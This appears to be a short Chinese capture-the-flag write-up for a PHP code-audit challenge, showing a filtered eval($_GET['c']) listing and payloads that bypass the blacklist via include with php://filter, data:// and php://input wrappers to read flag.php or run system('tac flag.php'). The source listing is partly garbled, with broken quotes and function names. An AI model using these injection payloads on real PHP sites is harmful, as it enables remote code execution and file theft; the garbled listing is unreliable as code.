- 代码审计
``php <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\|echo|\;|(|\:|\”/i”, $c)) //增加了:过滤 {
}eval($c);
}else{ highlightfile(_FILE); }
2. payload与web33相似
```shell
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
?c=include$_GET[a]?>&a=data://text/plain,<?php system('tac flag.php');?>
?c=include$_GET[a]?>&a=php://input
#POST提交
<?php system('tac flag.php');?>
若有收获,就点个赞吧
0 人点赞
